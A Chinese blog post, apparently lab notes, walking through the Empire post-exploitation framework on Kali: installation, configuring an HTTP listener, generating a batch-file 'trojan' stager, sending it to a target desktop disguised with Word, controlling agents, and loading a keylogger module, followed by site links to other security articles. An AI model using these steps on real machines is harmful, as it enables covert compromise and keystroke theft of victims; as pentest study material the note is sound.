网络渗透之帝国

已于 2022-05-19 09:05:39 修改
阅读量111 收藏
点赞数
文章标签: 安全 linux 服务器 web安全 github
于 2022-05-19 08:59:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yang____xiao/article/details/124855723
版权

1.下载帝国的三个方法
1.1 window中通过网站下载Releases · EmpireProject/Empire · GitHub

使用empire2.5版本,不是所有电脑都适用(kali)  

 1.2 kali中直接下载
(root账号下执行命令)

git clone https://github.com/BC-SECURITY/Empire   #下载帝国

cd  Empire

查看python环境
python

python2

exit()退出python环境

 1.3 kali中通过powershell安装
1.3.1开启服务
 sudo  apt install powrshell-empire  #安装帝国

  powershell-empire  server  #开启服务

 powershell-empire  client  #开启客户端

  

 2.监听命令
2.1监听hhtp
 listeners  #进入监听界面

 #进入http监听模式

2.2设置监听
set  Name text1  #设置一个监听

set  Host  192.168.48.128/9999

set  Port 9999

 execute #回到监听页面

list / listeners

2.3木马
2.3.1 生成bat类型的木马
uselistener

usestager windows/launcher_bat 

info  #查看一些基本信息

  set Listener text1 #设置你想使用哪个监听线程

 按照路径提示找木马文件

 agents  #查看监听状态

interact  代理名称  #连接操作系统

复制生成的木马发送到主机桌面

bat可以使用word进行伪装

 2.3.2 监听键盘
usemodule powershell/collection/keylogger

Yang____xiao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网站渗透测试报告模板.doc
07-09
网站渗透测试报告模板.doc
网络渗透测试基础之帝国202105110124郭静
weixin_67854030的博客
05-18 349
1.下载帝国的三个方法 1.1 window中通过网站下载 Releases · EmpireProject/Empire · GitHub 使用empire2.5版本,不是所有电脑都适用(kali) 1.2 kali中直接下载 (root账号下执行命令) git clone https://github.com/BC-SECURITY/Empire#下载帝国cdEmpire 查看python环境 python python2 退出python环境1.3 kali中通过powers...
网络渗透测试(完善版)
xinxijishu2的博客
03-10 872
1.Whois 查询 Whois是一个标准的互联网协议,用于收集网络注册信息,注册的域名,IP地址等信息。简单来说,Whois就是一个用于查询域名是否已被注册以及注册域名的详细信息的数据库(如域名所有人,域名注册商)。在Whois查询中,得到注册人的姓名和邮箱信息通常对测试个人站点非常有用,因为我们可以通过搜索引擎和社交网络挖掘出域名所以人的信息。对中小站点而言,域名所有人往往就是管理员。 2.备案信息查询 网站备案是根据国家法律法规规定,需要网站的所有者向国家有关部门申请的备案,这是国家信息产业部.
渗透测试实验一报告
JNpvA的博客
11-02 1693
1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。 2、照片中的女生在哪里旅行? 截图搜索到的地址信息。 3、手机位置定位。通过LAC(Location Area Code,位置区域码)和CID(Cell Identity,基站编号,是个16位的数据(范围是0到65535)可以查询手机接入的基站的位置,从而初步确定手机用户的位置。 获取自己手机的LAC和CID: Android 获取方法:Android: 拨号##46
我的渗透学习实验(一)
r00tnb的博客
01-26 1054
这次的渗透实验是在i春秋的在线挑战上做的,这是第一关,以后还会继续写一些自己的渗透学习过程,就当练习后的总结吧!写的可能不好有错误,希望大家指正,还有这些只是对自己实验的记录,如果大家要学习的话还是上i春秋吧,我怕误导大家(ps:i春秋真是一个学习的好网站!另外,我还是个新手。。。。) 题目:我很简单,请不要欺负我 要求:拿到服务器的权限 由于是渗透测试入门的题目,所以漏洞就很多。但是,
网络渗透技术
03-03
深入浅出的介绍网络安全技术,缓冲区是本书的重点!
网络渗透测试实验报告三
12-27
网络渗透测试实验报告三
网络渗透测试实验报告二
12-27
网络渗透测试实验报告二
网络渗透技术.rar
06-13
第1章 基础知识;第2章 缓冲区溢出利用技术;第3章 shellcode技术;第4章 格式化串漏洞利用技术等等
渗透之流量劫持
02-25
网络渗透攻击中,攻击者如果获取了域的权限,那么攻击者就有可能获取公司的机密,控制公司的一切。所以域安全是企业安全最为核心的一个环节,并且微软对域本身也在进行不断的安全加固。NSA泄漏的文档和工
网络渗透测试实验四
babywhale_bi的博客
12-13 3841
网络渗透测试实验报告 实验目的 通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用,系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具:不限 实验内容、原理 目的:获取靶机Web Developer 文件/roo..
metasploit渗透测试
BigYellow
11-08 3958
一些常用指令msfconsole 打开控制台终端 msfupdate 更新 help [command] e.g. help search 命令使用帮助信息 search […] e.g. search portscanuse … 选择渗透攻击模块 show payloads 查看与该攻击模块相兼容的攻击载荷 set payload … 设置攻击载荷 set t
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 654
作用就是定义属性之间的数学关系
Nginx - 安全基线配置与操作指南
小工匠
05-19 916
我们这里主要介绍针对Nginx中间件的安全基线配置指南,包括版本选择、用户创建、权限设置、缓冲区配置、日志管理、访问限制、错误页面处理、并发控制、补丁更新等方面。同时还涵盖了如何配置正向代理模块、防止目录遍历以及服务监控等内容,旨在指导系统管理员确保中间件服务器安全性本文档规定了中间件服务器应当遵循的安全性设置标准,旨在指导系统管理人员或安全检查人员进行中间件的安全合规性检查和配置。
[图解]SysML和EA建模住宅安全系统-07 to be块定义图
rolt的专栏
05-21 666
然后再针对这个画一个块内部图,然后这里再把签名拖上去
HLS视频加密,让您的视频内容更安全
云存储小天使的博客
05-21 425
HLS视频加密是一种基于HTTP Live Streaming(HLS)协议的加密技术。它的核心思想是将视频切片进行加密处理,在客户端播放时需要先获取解密密钥才能正常偶发。通过这种方式,HLS加密可以有效防止未经授权的第三方窃取视频内容,从而保障了视频内容的版权和安全。数据万象媒体处理服务提供了一套HLS视频加密方案,方便用户各个场景的需求。
如何选择一款安全高效的数据自动同步工具?
文件数据安全交换
05-21 172
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。由于大部分的数据都是需要实时的同步到其他节点进行使用和分析的,原有的数据传输方式没有任何的消息通知,也没有日志记录可查询,需要靠人工去各个节点确认,费时费力,效率低下;提供完善的数据同步日志和用户操作日志,便于查询和审计,快速排查错误或遗漏。
深度学习之基于YoloV5的建筑场所安全检测系统
2301_79810943的博客
05-21 252
一、项目背景与目标随着城市化进程的加速,建筑场所的安全问题日益受到关注。为了实现对建筑场所的全面、实时监控,并及时发现潜在的安全隐患,本项目旨在利用深度学习技术,开发一个基于YoloV5算法的建筑场所安全检测系统。二、技术选型与特点YoloV5算法:本项目采用YoloV5作为核心检测算法。YoloV5以其高精度、快速检测速度和强大的多尺度检测能力著称,非常适合用于复杂建筑场所的安全检测。
检测高空作业人员安全绳是否佩戴系统
最新发布
燧机科技的博客
05-21 178
检测高空作业人员安全绳是否佩戴系统基于AI视觉智能分析算法,检测高空作业人员安全绳是否佩戴系统通过现场摄像头对高处作业区域内的人员进行自动检测识别。系统能够快速、准确地检测高空作业人员是否佩戴安全绳。一旦系统检测到人员未佩戴安全绳,会立即进行告警,并将告警信息推送给相关管理者。检测高空作业人员安全绳是否佩戴系统通过实时检测和告警,系统可以及时发现安全隐患,并采取相应措施防范事故的发生。该系统采用视频图像自动识别的形式,不需要新增硬件,实时监控识别,实时告警,简单方便。
网络安全渗透测试教程
10-08
网络安全渗透测试是评估计算机系统、网络或应用程序的安全性和弱点的过程。以下是一个基本的网络安全渗透测试教程: 1. 信息收集:收集目标系统或网络的相关信息,包括IP地址、域名、子域名等。可以使用whois查询、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值